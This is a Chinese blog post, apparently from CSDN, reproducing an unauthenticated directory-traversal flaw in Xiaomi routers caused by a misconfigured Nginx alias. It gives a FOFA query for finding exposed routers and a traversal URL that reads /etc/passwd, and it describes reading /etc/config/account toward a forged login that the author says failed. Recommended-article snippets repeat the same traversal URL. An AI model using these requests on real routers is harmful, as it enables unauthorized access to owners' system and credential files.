小米路由器的未授权访问

最新推荐文章于 2024-07-17 14:01:41 发布
最新推荐文章于 2024-07-17 14:01:41 发布
阅读量414 收藏
点赞数
分类专栏: 网络安全 web安全 渗透测试 漏洞复现 文章标签: 智能路由器 网络安全 web安全 渗透测试 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/131436030
版权
本文探讨了小米路由器由于Nginx配置不当导致的目录穿越漏洞,通过fofa搜索引擎定位到问题,攻击者可以利用特定URL读取敏感文件如/etc/passwd。尽管尝试构造登录包进行复现,但未完全成功。
摘要由CSDN通过智能技术生成

01 漏洞产生

小米路由器由于Nginx的配置文件,没有配置好,存在一个目录穿越的漏洞。

在Nginx当中存在该漏洞,配置如下:

location /xxx {
    alias /abc/;
}

02 fofa搜索

app=“小米路由器”

03 漏洞利用

如此配置,攻击者可通过

Url:http://ip/xxx…/etc/passwd

来读取到/etc/passwd 文件

而在小米路由器当中的Nginx配置危机为:

location /api-third-party/download/extdisks {
    alias /extdisks/;
}

那可以通过

Url:http://ip/api-third-party/download/extdisks…/etc/passwd

来读取到/etc/passwd文件
在这里插入图片描述
读取构造包/etc/config/account 构造登录包
在这里插入图片描述
后面的构造登录比较难,我也没复现成功

丢了少年失了心1
关注
专栏目录
订阅专栏
小米路由器怎么设置 小米路由器设置教程图文详解
10-01
- **终端管理**:在后台管理界面,你可以查看所有连接设备,一键断开指定设备的网络连接,有效防止非授权访问。 - **应用管理**:通过小米账号,实现对路由器的远程管理,提供更多个性化服务和应用。 小米路由器...
璇铠安全实验室| 小米路由器授权访问
pone2233的博客
04-03 1766
漏洞产生 小米路由器由于Nginx的配置文件,没有配置好,存在一个目录穿越的漏洞。 在Nginx当中存在该漏洞,配置如下: location /xxx { alias /abc/; } 漏洞利用 如此配置那攻击者可通过Url:http://ip/xxx../etc/passwd 来读取到/etc/passwd 文件。 而在小米路由器当中的Nginx配置危机为: location /api-third-party/download/extdisks { alias /extd
小米路由器远程任意文件读取漏洞(CVE-2019-18371)
holen_的博客
01-26 3444
小米路由器的nginx配置文件错误,导致目录穿越漏洞,实现任意文件读取(无需登录) nginx配置不当可导致目录穿越漏洞 location /xxx { alias /abc/; } 可通过访问http://domain.cn/xxx…/etc/passwd实现目录穿越访问上级目录及其子目录文件。 在小米路由器的文件/etc/sysapihttpd/sysapihttpd.conf中,存在 location /api-third-party/download/extdisks { alias
小米AX9000路由器CVE-2023-26315漏洞挖掘
最新发布
jennycisp的博客
07-17 1024
一年多前,看到小米SRC公众号推文搞了个赏金活动,于是挖了挖当时比较新的一款AX9000路由器,挖到了两个命令注入漏洞,不过没什么本事,挖的都是授权后的,危害一般。小米给的赏金还是很可观的,但是补丁发布的速度不知为何比较慢(交了这么多厂商,还是Zyxel和华硕的响应速度最快),所以一直也没能分配CVE编号,我也遵守小米的规定在漏洞披露前公开相关漏洞细节。直到最近和其他朋友聊起这个漏洞,才想起来已经过去了一年多,应该是能公开了,于是又去找了小米SRC的运营小姐姐。
小米路由器http文件服务器,小米路由器远程任意文件读取漏洞(CVE-2019-18371)
weixin_36004568的博客
08-09 1419
## 远程任意文件读取漏洞(CVE-2019-18371)#### 小米路由器的nginx配置文件错误,导致目录穿越漏洞,实现任意文件读取(无需登录)nginx配置不当可导致目录穿越漏洞,```location /xxx {alias /abc/;}```可通过访问`http://domain.cn/xxx../etc/passwd`实现目录穿越访问上级目录及其子目录文件。在小米路由器的文件`/e...
记一次小米路由器任意文件读取漏洞
weixin_63021331的博客
03-31 1352
任意文件读取漏洞,是web安全里高危的漏洞,它可以泄露源码、数据库配置文件等等,导致网站处于极度不安全状态。而这里介绍的是小米路由器的nginx配置文件错误,导致目录穿越漏洞,实现任意文件读取(无需登录)具体登录进去就不说啦,毕节授权的登录是违法的。到这里对于该漏洞的说明就已经讲解完啦,该漏洞大多来源与香港和台湾,大陆也有,当然大家也可以拿到漏洞平台去获得小部分奖励。大陆的基本上都被修复了,这次的漏洞挖掘大家可以去学习和参考。
小米路由器3的nginx的位置以及nginx的配置文件的位置
php菜鸟博客
08-04 493
把 nginx 改名为 sysapihttpd, 放在 /usr/sbin/sysapihttpd,然后把 配置文件改为 /etc/sysapihttpd/sysapihttpd.conf
iPad怎么访问小米路由器共享盘的视频和相片?.docx
09-26
本文将详细介绍如何使用iPad访问小米路由器共享盘中的视频和照片。 首先,由于iPad的内置应用如照片和视频 app 并不支持直接访问NAS设备(如小米路由器)上的文件,我们需要借助第三方应用来实现这一目标。这里推荐...
电脑怎么访问小米路由器3外置存储?
10-02
此外,为了确保数据安全,记得在不使用时断开USB设备的网络连接,避免授权访问。如果需要,还可以在小米路由器3的管理界面设置访问权限,限制不同设备对USB存储的访问。 总的来说,通过上述步骤,你就能轻松地...
小米路由青春版怎么用手机设置 手机设置小米路由器青春版图文教程
10-01
最后,在使用手机设置小米路由器青春版时,用户还应当注意网络安全,设置一个强大并且难以破解的路由器管理密码,并定期更换,同时避免使用过于简单和常见的WiFi密码,以防止授权用户访问自己的网络资源。
Jenkins授权访问+命令执行
m0_49577923的博客
11-11 5861
前言 翻越高山需要迈出一个又一个简单的步伐 一、Jenkins简介 Jenkins是一个独立的、开放源码的自动化服务器,它可以用于自动化与构建、测试、交付或部署软件相关的各种任务。Jenkins是一个CI工具。它可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告 二、Jenkins授权访问 由于Jenkins默认安装的时候管理员安全意识不高,没有配置密码,所以可以导致任意用户授权访问到控制页面并且可以对里面的配置进行修改。 正常页面应该是需
授权访问漏洞汇总
weixin_46137328的博客
09-23 7563
本文共11695个字,可以先收藏后看。漏洞概览: Elasticsearch授权访问漏洞 Hadoop授权访问漏洞 Jenkins授权访问 MongoDB授权访问 Zoo...
Apache Flink 授权访问+远程代码执行
Adminxe的博客
11-12 1095
0x00 前言 @Adminxe 今天胖胖表哥突然扔来一个复现,那俺得瞧瞧,正好写个博客划划水,然后就引发了下面一些列的操作以及你想看到的,以及和你不想看到的文字。之前就有大佬复现过,毕竟水文和复现学习,那就来一波吧!最可恶的是,今天的MC兄没有请客喝啵啵奶茶,必须点名批评一下! 从现在fofa的搜索量来看,基本也就是国内Apache Flink 存在1500左右的站点。 有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围: <= 1.9.1(最..
Apache APISIX Dashboard 授权访问(CVE-2021-45232 )
m0_54125423的博客
03-01 5180
一、漏洞原理 Apache APISIX是一个实时、动态、高性能的API网关。Apache APISIX Dashboard旨在让用户尽可能容易地通过前端界面来操作Apache APISIX。 2021年12月27日,Apache官方发布安全通告,Apache APISIX Dashboard中存在一个授权访问漏洞(CVE-2021-45232)。 在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架,在框架 "gin "的基础上引入了框架 "d
Apache Superset 授权访问漏洞(CVE-2023-27524)
holyxp的博客
06-30 662
Apache Superset 是美国阿帕奇(Apache)基金会的一个数据可视化和数据探索平台。
第32天:WEB漏洞~文件操作之文件下载读取全解
廖一语山的博客
10-12 991
文件下载,小迪
三、Web漏洞-文件操作
weixin_70557959的博客
05-06 815
目录 31、文件操作之文件包含漏洞全解 原理 一、本地文件包含代码测试——原理 1.无限制包含漏洞文件 2.有限制文件包含漏洞 二、远程文件包含代码测试——原理 1.无限制 2.有限制 三、各种协议流提交流测试-协议 php伪协议 - 看不尽的尘埃 - 博客园 1.读取文件源码filter 2.执行php代码input 3.写入一句话木马 input 4.读取文件file:// 5.数据流封装data:// 四、某CMS程序文件包含利用-黑盒(...
小米路由器外挂程序开发指南
"小米路由器外掛程式開發文檔提供了关于如何开发小米路由器插件的详细指南,涵盖了两种类型的插件,以及开发过程中需要的步骤和技能。开发者需要了解HTML、JavaScript和CSS等前端技术,注册成为小米开发者并获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值